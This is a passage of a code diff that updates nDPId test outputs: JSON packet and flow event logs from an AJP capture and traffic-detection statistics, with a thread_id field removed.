Glvbi94LXd3dy1mb3JtLXVybGVuY29kZWQAoAEAVXRleHQvaHRtbCxhcHBsaWNhdGlvbi94aHRtbCt4bWwsYXBwbGljYXRpb24veG1sO3E9MC45LGltYWdlL3dlYnAsaW1hZ2UvYXBuZywqLyo7cT0wLjgAoA0AW2h0dHA6Ly9zaXN0ZW1hc2NjcC5pbmVwLmdvdi5ici9DQ1AvcGFnZXMvcmVsYXRvcmlvcy9yZWxhdG9yaW9EZU9yZGVtRGVTZXJ2aWNvLnNlYW0\/Y2lkPTY4MDgAAA9BY2NlcHQtRW5jb2RpbmcAAARnemlwAAAPQWNjZXB0LUxhbmd1YWdlAAAjcHQtQlIscHQ7cT0wLjgsZW4tVVM7cT0wLjYsZW47cT0wLjQAoAgAAzIxOQCgCQAySlNFU1NJT05JRD0wODUzOTA3RDhFMzI0Nzc2QTc0QzJBNTBBMzI2NjRFMi4wMDkxNDcAoAsAF3Npc3RlbWFzY2NwLmluZXAuZ292LmJyAAAMWC1JTUZvcndhcmRzAAACMjAABgAGMDA5MTQ3AAoAD0FKUF9SRU1PVEVfUE9SVAAABDU3MDUACgAQSktfTEJfQUNUSVZBVElPTgAAA0FDVAD\/"}
00213{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":11,"source":"ajp.pcap","alias":"nDPId-test","l4_data_len":878,"global_ts_msec":1505154584448} 00199{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":11,"source":"ajp.pcap","alias":"nDPId-test","l4_data_len":878,"global_ts_msec":1505154584448}
00395{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":16,"source":"ajp.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1505154584448,"pkt":"Agq9AAAAAgq8AAAAiQNAIABQVoNdWABQVoOO84EAAAcIAEUAADTBYkAAQAYOAqwdCZOsHQmSH0mXyJOgLr5yxd9QgBAAi3iVAAABAQgKHlfv2k6caeg="} 00381{"packet_event_id":1,"packet_event_name":"packet","packet_id":16,"source":"ajp.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1505154584448,"pkt":"Agq9AAAAAgq8AAAAiQNAIABQVoNdWABQVoOO84EAAAcIAEUAADTBYkAAQAYOAqwdCZOsHQmSH0mXyJOgLr5yxd9QgBAAi3iVAAABAQgKHlfv2k6caeg="}
00212{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":16,"source":"ajp.pcap","alias":"nDPId-test","l4_data_len":52,"global_ts_msec":1505154584448} 00198{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":16,"source":"ajp.pcap","alias":"nDPId-test","l4_data_len":52,"global_ts_msec":1505154584448}
00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":20,"source":"ajp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1505154584618,"flow_last_seen":1505154584618,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1505154584618,"l3_proto":"ip4","src_ip":"172.29.9.146","dst_ip":"172.29.9.147","src_port":38856,"dst_port":8010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":20,"source":"ajp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1505154584618,"flow_last_seen":1505154584618,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1505154584618,"l3_proto":"ip4","src_ip":"172.29.9.146","dst_ip":"172.29.9.147","src_port":38856,"dst_port":8010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"ajp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1505154584618,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":78,"pkt_l4_len":40,"thread_ts_msec":1505154584618,"pkt":"AFBWg47zAFBWg11YgQAABwgARQAAPLLIQABABhyUrB0JkqwdCZOXyB9KcsXbLwAAAACgAjkI5gwAAAIEBbQEAggKTpxp5wAAAAABAwMH"} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"ajp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1505154584618,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":78,"pkt_l4_len":40,"thread_ts_msec":1505154584618,"pkt":"AFBWg47zAFBWg11YgQAABwgARQAAPLLIQABABhyUrB0JkqwdCZOXyB9KcsXbLwAAAACgAjkI5gwAAAIEBbQEAggKTpxp5wAAAAABAwMH"}
00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"ajp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1505154584618,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":78,"pkt_l4_len":40,"thread_ts_msec":1505154584618,"pkt":"AFBWg11YAFBWg47zgQAABwgARQAAPAAAQABABs9crB0Jk6wdCZIfSpfIk6AuuHLF2zCgEjiQFesAAAIEBbQEAggKHlfv2E6caecBAwMH"} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"ajp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1505154584618,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":78,"pkt_l4_len":40,"thread_ts_msec":1505154584618,"pkt":"AFBWg11YAFBWg47zgQAABwgARQAAPAAAQABABs9crB0Jk6wdCZIfSpfIk6AuuHLF2zCgEjiQFesAAAIEBbQEAggKHlfv2E6caecBAwMH"}
00407{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":22,"source":"ajp.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":1505154584618,"pkt":"Agq9AAAAAgq8AAAAiQNAIABQVoNdWABQVoOO84EAAAcIAEUAADwAAEAAQAbPXKwdCZOsHQmSH0mXyJOgLrhyxdswoBI4kBXsAAACBAW0BAIICh5X79hOnGnnAQMDBw=="} 00393{"packet_event_id":1,"packet_event_name":"packet","packet_id":22,"source":"ajp.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":1505154584618,"pkt":"Agq9AAAAAgq8AAAAiQNAIABQVoNdWABQVoOO84EAAAcIAEUAADwAAEAAQAbPXKwdCZOsHQmSH0mXyJOgLrhyxdswoBI4kBXsAAACBAW0BAIICh5X79hOnGnnAQMDBw=="}
00212{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":22,"source":"ajp.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":1505154584618} 00198{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":22,"source":"ajp.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":1505154584618}
00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"ajp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1505154584618,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":70,"pkt_l4_len":32,"thread_ts_msec":1505154584618,"pkt":"AFBWg47zAFBWg11YgQAABwgARQAANLLJQABABhybrB0JkqwdCZOXyB9KcsXbMJOgLrmAEABzfNMAAAEBCApOnGnoHlfv2A=="} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"ajp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1505154584618,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":70,"pkt_l4_len":32,"thread_ts_msec":1505154584618,"pkt":"AFBWg47zAFBWg11YgQAABwgARQAANLLJQABABhybrB0JkqwdCZOXyB9KcsXbMJOgLrmAEABzfNMAAAEBCApOnGnoHlfv2A=="}
00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":24,"source":"ajp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1505154584618,"flow_last_seen":1505154584618,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5,"flow_tot_l4_payload_len":5,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1505154584618,"l3_proto":"ip4","src_ip":"172.29.9.146","dst_ip":"172.29.9.147","src_port":38856,"dst_port":8010,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"AJP","breed":"Acceptable","category":"Web"}} 00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":24,"source":"ajp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1505154584618,"flow_last_seen":1505154584618,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5,"flow_tot_l4_payload_len":5,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1505154584618,"l3_proto":"ip4","src_ip":"172.29.9.146","dst_ip":"172.29.9.147","src_port":38856,"dst_port":8010,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"AJP","breed":"Acceptable","category":"Web"}}
00407{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":25,"source":"ajp.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":1505154584618,"pkt":"Agq8AAAAAgq9AAAAiQNAIABQVoOO8wBQVoNdWIEAAAcIAEUAADyyyEAAQAYclKwdCZKsHQmTl8gfSXLF2y8AAAAAoAI5COYNAAACBAW0BAIICk6caecAAAAAAQMDBw=="} 00393{"packet_event_id":1,"packet_event_name":"packet","packet_id":25,"source":"ajp.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":1505154584618,"pkt":"Agq8AAAAAgq9AAAAiQNAIABQVoOO8wBQVoNdWIEAAAcIAEUAADyyyEAAQAYclKwdCZKsHQmTl8gfSXLF2y8AAAAAoAI5COYNAAACBAW0BAIICk6caecAAAAAAQMDBw=="}
00212{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":25,"source":"ajp.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":1505154584618} 00198{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":25,"source":"ajp.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":1505154584618}
00395{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":27,"source":"ajp.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1505154584618,"pkt":"Agq9AAAAAgq8AAAAiQNAIABQVoNdWABQVoOO84EAAAcIAEUAADTBYEAAQAYOBKwdCZOsHQmSH0mXyJOgLrlyxds1gBAAcnzPAAABAQgKHlfv2U6caeg="} 00381{"packet_event_id":1,"packet_event_name":"packet","packet_id":27,"source":"ajp.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1505154584618,"pkt":"Agq9AAAAAgq8AAAAiQNAIABQVoNdWABQVoOO84EAAAcIAEUAADTBYEAAQAYOBKwdCZOsHQmSH0mXyJOgLrlyxds1gBAAcnzPAAABAQgKHlfv2U6caeg="}
00212{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":27,"source":"ajp.pcap","alias":"nDPId-test","l4_data_len":52,"global_ts_msec":1505154584618} 00198{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":27,"source":"ajp.pcap","alias":"nDPId-test","l4_data_len":52,"global_ts_msec":1505154584618}
00405{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":29,"source":"ajp.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":91,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":91,"pkt_l4_len":0,"thread_ts_msec":1505154584618,"pkt":"Agq9AAAAAgq8AAAAiQNAIABQVoNdWABQVoOO84EAAAcIAEUAADnBYUAAQAYN\/qwdCZOsHQmSH0mXyJOgLrlyxds1gBgAcjJ\/AAABAQgKHlfv2U6caehBQgABCQ=="} 00391{"packet_event_id":1,"packet_event_name":"packet","packet_id":29,"source":"ajp.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":91,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":91,"pkt_l4_len":0,"thread_ts_msec":1505154584618,"pkt":"Agq9AAAAAgq8AAAAiQNAIABQVoNdWABQVoOO84EAAAcIAEUAADnBYUAAQAYN\/qwdCZOsHQmSH0mXyJOgLrlyxds1gBgAcjJ\/AAABAQgKHlfv2U6caehBQgABCQ=="}
00212{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":29,"source":"ajp.pcap","alias":"nDPId-test","l4_data_len":57,"global_ts_msec":1505154584618} 00198{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":29,"source":"ajp.pcap","alias":"nDPId-test","l4_data_len":57,"global_ts_msec":1505154584618}
01502{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":30,"source":"ajp.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":912,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":912,"pkt_l4_len":0,"thread_ts_msec":1505154584618,"pkt":"Agq8AAAAAgq9AAAAiQNAIABQVoOO8wBQVoNdWIEAAAcIAEUAA26yzEAAQAYZXqwdCZKsHQmTl8gfSXLF2zWToC6+gBgAc\/j3AAABAQgKTpxp6B5X79kSNAM2AgQACEhUVFAvMS4xAAA0L0NDUC9wYWdlcy9yZWxhdG9yaW9zL3JlbGF0b3Jpb0RlT3JkZW1EZVNlcnZpY28uc2VhbQAADDE3Mi4yOS4wLjEyOQD\/\/wAXc2lzdGVtYXNjY3AuaW5lcC5nb3YuYnIAAFAAAA6gBgAKa2VlcC1hbGl2ZQAADUNhY2hlLUNvbnRyb2wAAAltYXgtYWdlPTAAAAZPcmlnaW4AAB5odHRwOi8vc2lzdGVtYXNjY3AuaW5lcC5nb3YuYnIAABlVcGdyYWRlLUluc2VjdXJlLVJlcXVlc3RzAAABMQCgDgBpTW96aWxsYS81LjAgKFgxMTsgTGludXggeDg2XzY0KSBBcHBsZVdlYktpdC81MzcuMzYgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvNjAuMC4zMTEyLjExMyBTYWZhcmkvNTM3LjM2AKAHACFhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQAoAEAVXRleHQvaHRtbCxhcHBsaWNhdGlvbi94aHRtbCt4bWwsYXBwbGljYXRpb24veG1sO3E9MC45LGltYWdlL3dlYnAsaW1hZ2UvYXBuZywqLyo7cT0wLjgAoA0AW2h0dHA6Ly9zaXN0ZW1hc2NjcC5pbmVwLmdvdi5ici9DQ1AvcGFnZXMvcmVsYXRvcmlvcy9yZWxhdG9yaW9EZU9yZGVtRGVTZXJ2aWNvLnNlYW0\/Y2lkPTY4MDgAAA9BY2NlcHQtRW5jb2RpbmcAAARnemlwAAAPQWNjZXB0LUxhbmd1YWdlAAAjcHQtQlIscHQ7cT0wLjgsZW4tVVM7cT0wLjYsZW47cT0wLjQAoAgAAzIxOQCgCQAySlNFU1NJT05JRD0wODUzOTA3RDhFMzI0Nzc2QTc0QzJBNTBBMzI2NjRFMi4wMDkxNDcAoAsAF3Npc3RlbWFzY2NwLmluZXAuZ292LmJyAAAMWC1JTUZvcndhcmRzAAACMjAABgAGMDA5MTQ3AAoAD0FKUF9SRU1PVEVfUE9SVAAABDU3MDUACgAQSktfTEJfQUNUSVZBVElPTgAAA0FDVAD\/"} 01488{"packet_event_id":1,"packet_event_name":"packet","packet_id":30,"source":"ajp.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":912,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":912,"pkt_l4_len":0,"thread_ts_msec":1505154584618,"pkt":"Agq8AAAAAgq9AAAAiQNAIABQVoOO8wBQVoNdWIEAAAcIAEUAA26yzEAAQAYZXqwdCZKsHQmTl8gfSXLF2zWToC6+gBgAc\/j3AAABAQgKTpxp6B5X79kSNAM2AgQACEhUVFAvMS4xAAA0L0NDUC9wYWdlcy9yZWxhdG9yaW9zL3JlbGF0b3Jpb0RlT3JkZW1EZVNlcnZpY28uc2VhbQAADDE3Mi4yOS4wLjEyOQD\/\/wAXc2lzdGVtYXNjY3AuaW5lcC5nb3YuYnIAAFAAAA6gBgAKa2VlcC1hbGl2ZQAADUNhY2hlLUNvbnRyb2wAAAltYXgtYWdlPTAAAAZPcmlnaW4AAB5odHRwOi8vc2lzdGVtYXNjY3AuaW5lcC5nb3YuYnIAABlVcGdyYWRlLUluc2VjdXJlLVJlcXVlc3RzAAABMQCgDgBpTW96aWxsYS81LjAgKFgxMTsgTGludXggeDg2XzY0KSBBcHBsZVdlYktpdC81MzcuMzYgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvNjAuMC4zMTEyLjExMyBTYWZhcmkvNTM3LjM2AKAHACFhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQAoAEAVXRleHQvaHRtbCxhcHBsaWNhdGlvbi94aHRtbCt4bWwsYXBwbGljYXRpb24veG1sO3E9MC45LGltYWdlL3dlYnAsaW1hZ2UvYXBuZywqLyo7cT0wLjgAoA0AW2h0dHA6Ly9zaXN0ZW1hc2NjcC5pbmVwLmdvdi5ici9DQ1AvcGFnZXMvcmVsYXRvcmlvcy9yZWxhdG9yaW9EZU9yZGVtRGVTZXJ2aWNvLnNlYW0\/Y2lkPTY4MDgAAA9BY2NlcHQtRW5jb2RpbmcAAARnemlwAAAPQWNjZXB0LUxhbmd1YWdlAAAjcHQtQlIscHQ7cT0wLjgsZW4tVVM7cT0wLjYsZW47cT0wLjQAoAgAAzIxOQCgCQAySlNFU1NJT05JRD0wODUzOTA3RDhFMzI0Nzc2QTc0QzJBNTBBMzI2NjRFMi4wMDkxNDcAoAsAF3Npc3RlbWFzY2NwLmluZXAuZ292LmJyAAAMWC1JTUZvcndhcmRzAAACMjAABgAGMDA5MTQ3AAoAD0FKUF9SRU1PVEVfUE9SVAAABDU3MDUACgAQSktfTEJfQUNUSVZBVElPTgAAA0FDVAD\/"}
00213{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":30,"source":"ajp.pcap","alias":"nDPId-test","l4_data_len":878,"global_ts_msec":1505154584618} 00199{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":30,"source":"ajp.pcap","alias":"nDPId-test","l4_data_len":878,"global_ts_msec":1505154584618}
00395{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":35,"source":"ajp.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1505154584618,"pkt":"Agq9AAAAAgq8AAAAiQNAIABQVoNdWABQVoOO84EAAAcIAEUAADTBYkAAQAYOAqwdCZOsHQmSH0mXyJOgLr5yxd9QgBAAi3iVAAABAQgKHlfv2k6caeg="} 00381{"packet_event_id":1,"packet_event_name":"packet","packet_id":35,"source":"ajp.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1505154584618,"pkt":"Agq9AAAAAgq8AAAAiQNAIABQVoNdWABQVoOO84EAAAcIAEUAADTBYkAAQAYOAqwdCZOsHQmSH0mXyJOgLr5yxd9QgBAAi3iVAAABAQgKHlfv2k6caeg="}
00212{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":35,"source":"ajp.pcap","alias":"nDPId-test","l4_data_len":52,"global_ts_msec":1505154584618} 00198{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":35,"source":"ajp.pcap","alias":"nDPId-test","l4_data_len":52,"global_ts_msec":1505154584618}
00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":38,"source":"ajp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1505154584447,"flow_last_seen":1505154584618,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":826,"flow_tot_l4_payload_len":1297,"flow_avg_l4_payload_len":99,"midstream":0,"thread_ts_msec":1505154584618,"l3_proto":"ip4","src_ip":"172.29.9.146","dst_ip":"172.29.9.147","src_port":38856,"dst_port":8009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"AJP","breed":"Acceptable","category":"Web"}} 00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":38,"source":"ajp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1505154584447,"flow_last_seen":1505154584618,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":826,"flow_tot_l4_payload_len":1297,"flow_avg_l4_payload_len":99,"midstream":0,"thread_ts_msec":1505154584618,"l3_proto":"ip4","src_ip":"172.29.9.146","dst_ip":"172.29.9.147","src_port":38856,"dst_port":8009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"AJP","breed":"Acceptable","category":"Web"}}
00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":38,"source":"ajp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1505154584618,"flow_last_seen":1505154584618,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":826,"flow_tot_l4_payload_len":1297,"flow_avg_l4_payload_len":99,"midstream":0,"thread_ts_msec":1505154584618,"l3_proto":"ip4","src_ip":"172.29.9.146","dst_ip":"172.29.9.147","src_port":38856,"dst_port":8010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"AJP","breed":"Acceptable","category":"Web"}} 00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":38,"source":"ajp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1505154584618,"flow_last_seen":1505154584618,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":826,"flow_tot_l4_payload_len":1297,"flow_avg_l4_payload_len":99,"midstream":0,"thread_ts_msec":1505154584618,"l3_proto":"ip4","src_ip":"172.29.9.146","dst_ip":"172.29.9.147","src_port":38856,"dst_port":8010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"AJP","breed":"Acceptable","category":"Web"}}
00470{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":38,"source":"ajp.pcap","alias":"nDPId-test","packets-captured":38,"packets-processed":26,"total-skipped-flows":0,"total-l4-data-len":2594,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":2,"total-idle-flows":2,"total-events-serialized":39,"global_ts_msec":1505154584618} 00470{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":38,"source":"ajp.pcap","alias":"nDPId-test","packets-captured":38,"packets-processed":26,"total-skipped-flows":0,"total-l4-data-len":2594,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":2,"total-idle-flows":2,"total-events-serialized":39,"global_ts_msec":1505154584618}
@@ -49,6 +49,6 @@
~~ total memory freed........: 4681424 bytes ~~ total memory freed........: 4681424 bytes
~~ total allocations/frees...: 101172/101172 ~~ total allocations/frees...: 101172/101172
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~ json string min len.......: 216 chars ~~ json string min len.......: 202 chars
~~ json string max len.......: 1507 chars ~~ json string max len.......: 1493 chars
~~ json string avg len.......: 860 chars ~~ json string avg len.......: 846 chars

24
test/results/alexa-app.pcapng.out
View File

@@ -1,9 +1,9 @@
00462{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"alexa-app.pcapng","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00462{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"alexa-app.pcapng","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0}
00469{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"alexa-app.pcapng","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-events-serialized":2,"global_ts_msec":1490976022526} 00469{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"alexa-app.pcapng","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-events-serialized":2,"global_ts_msec":1490976022526}
